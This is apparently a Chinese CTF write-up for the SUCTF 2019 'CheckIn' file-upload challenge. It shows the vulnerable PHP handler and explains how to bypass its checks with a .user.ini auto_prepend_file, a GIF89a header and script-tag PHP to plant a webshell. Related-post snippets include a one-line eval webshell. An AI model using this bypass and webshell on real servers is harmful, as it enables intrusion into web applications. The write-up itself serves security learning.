[SUCTF 2019] Check In 1

最新推荐文章于 2023-07-14 16:12:58 发布
最新推荐文章于 2023-07-14 16:12:58 发布
阅读量224 收藏
点赞数
分类专栏: buuctf的wp 文章标签: web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/c1516175954/article/details/129293371
版权 
<?php
// error_reporting(0);
$userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]);
//REMOTE_ADDR:访问该页面的远端ip
if (!file_exists($userdir)) {
    mkdir($userdir, 0777, true);
}
//建立userdir文件夹,可读可写可执行
file_put_contents($userdir . "/index.php", "");
//在userdir下创建空的index.php
if (isset($_POST["upload"])) {
    $tmp_name = $_FILES["fileUpload"]["tmp_name"];
    $name = $_FILES["fileUpload"]["name"];
    if (!$tmp_name) {
        die("filesize too big!");
    }
    if (!$name) {
        die("filename cannot be empty!");
    }
    $extension = substr($name, strrpos($name, ".") + 1);
//strrpos取字符串最后出现的位置索引
    if (preg_match("/ph|htacess/i", $extension)) {
        die("illegal suffix!");
    }
//匹配截取后缀 .user.ini绕过
    if (mb_strpos(file_get_contents($tmp_name), "<?") !== FALSE) {
        die("&lt;? in contents!");
    }
//读取上传文件内容,过滤<?
//<script language=php><script/> 绕过
    $image_type = exif_imagetype($tmp_name);
    if (!$image_type) {
        die("exif_imagetype:not image!");
    }
//exif_imagetype 检查签名
//image/gif GIF89a  绕过
    $upload_file_path = $userdir . "/" . $name;
    move_uploaded_file($tmp_name, $upload_file_path);
    echo "Your dir " . $userdir. ' <br>';
    echo 'Your files : <br>';
    var_dump(scandir($userdir));
}

.user.ini实际上就是一个可以由用户“自定义”的php.ini,php文件执行前会扫描配置文件,在.user.ini中输入

auto_prepend_file=cxk.jpg

即可达到文件包含的目的,然后再上传cxk.jpg,访问同一目录下的index.php,就可以连接 antsword

立即访问index.php可能包含不了我们的木马,因为.user.ini每隔300秒读取一次

参考链接, 对于.user.ini 有更详细的讲解:

土木牛马勇闯天涯
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[SUCTF 2019]CheckIn 1(详解)
qq_52843575的博客
12-12 5981
1.基础检测 进入页面是一个简单文件上传界面,正常上传文件,发现上传空内容的jpg文件显示(exif_imagetype:not image!),可知有内容检测,上传代码文件也发现后缀名过滤 开始抓包操作,因为后缀名验证,伪造文件属性也失效了,与此同时发现“?”被过滤了简单利用 2.解题关键 这道题解题关键在于怎样突破后缀名绕过,就得利用.user.ini文件留后门了 user.ini留后门原理 简单来说,就是利于.user.ini指定文件,在其当前目录下的文件执行时会将你指定的文件中的代码执行出
VS2019Check box实例
08-04
环境:VS2019 功能: 1、MFC中check box的使用方法 2、MFC中Radio Button的使用方法
[SUCTF 2019]CheckIn1
cuddlylm的博客
05-25 222
参考:https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html 有点类似于.htaccess文件 利用.user.ini文件留后门 利用.user.ini指定文件,在其当前目录下的文件执行时会将你指定的文件中的代码执行出来,以此带入后门 先上传.user.ini文件 #define width 20 #define height 10 auto.
[SUCTF 2019] CheckIn 1
feng的博客
10-22 1142
知识点 上传.user.ini文件,条件如下: (1)服务器脚本语言为PHP (2)对应目录下面有可执行的php文件 (3)服务器使用CGI/FastCGI模式 现在大部分网站都是用的fastcgi,这个东西我理解的是可以提供web服务器的一种api,而apache/nginx/iis这些服务器都会依靠这种api来运行 而在服务器以fastcgi启动运行的时候,.user.ini也是php的一种配置文件,众所周知php.ini是php的配置文件,它可以做到显示报错,导入扩展,文件解析,web站点路径等等设置
[SUCTF 2019]CheckIn 1
m0_51426816的博客
03-12 249
查看GitHub中的源码 <?php // error_reporting(0); $userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]); if (!file_exists($userdir)) { mkdir($userdir, 0777, true); } file_put_contents($userdir . "/index.php", ""); if (isset($_POST["upload"])) { $tmp_name
De1ctf 2020 -‘check in’ writeup
01-09
perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents! 所以两个文件都不能出现这些字符,参考这篇文章的马,fuzzhttps://blog.csdn.net/l1028386804/article/details/84206143 ...
遗传算法_Check_flameoj1_algorithm_
10-01
Genetic algorithm pdf
check-in
03-30
签到/打卡系统GIT日志开发[dev]修复[fix]测试[test]改进[refine]合并[merge]发行[release]GIT分支主线[master]开发[develop]功能[feature]修复[fix]发行[release]
color_check.rar_color_in
09-23
colour check image in image processing
[SUCTF 2019]CheckIn 1
qq_49422880的博客
06-12 142
文件上传漏洞 今天不讲题解,讲原理,碰到文件上传漏洞,其实已经做了很多的题目,但是发现对于其中的两个配置文件不是特别饿熟悉,特写此文学习记录。     .htaccess漏洞 可以让我们上传文件时可以通过修改服务器的配置文件,可以让服务器对我们上传的文件产生错误的解析,所以在上传文件的时候如果上传不成功,或则格式不正确,可以试试修改.htaccess文件,然后上传修改的方式。 <Directory /> Options FollowSymLinks AllowOverride A
BUU实战笔记——[SUCTF 2019]CheckIn 1
qq_51175992的博客
07-14 171
文件上传中利用到.user.ini配置文件
web buuctf [SUCTF 2019]CheckIn1
weixin_44214568的博客
03-15 1487
如图,应该是一个文件上传的题目; 1.上传一句话木马: 上传php文件,提示illegal suffix!(非法后缀),改一下后缀,php3,phtml,Php都是一样的提示,应该是对文件后缀进行了过滤 改成jpg格式的提示exif_imagetype:not image!,后台函数进行了过滤 2.改文件头GIF89a?<script language="php">eval($_post['a']);</script> 上传后提示 能够看到文件上传的路径,和文件所在位..
BUUCTF Web [SUCTF 2019]CheckIn1
网安小趴菜
09-09 376
上传成功,访问一下.htaccess,神奇的是直接下载了一个index.htaccess文件,感觉是没戏了,抱着试一试的态度访问了一下图片马,果然,还是jpg无法解析。此时访问上传jpg文件是无法解析我们的php代码的,需要再上传个.htaccess文件(前面也要加上文件头)既然不能通过.htaccess的方法解析图片马,那就搜一下大佬的wp,发现他们都用了.user.ini方法。上传成功,但图片马好像没了,还需要再传一次,上传成功,先访问一下index.php,蚁剑连接。启动靶机,直接尝试传木马。
check incheck out
最新发布
08-26
- *1* *2* *3* [妙用“Check out”与“Check In”](https://blog.csdn.net/ShelleyLiu0415/article/details/49445229)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值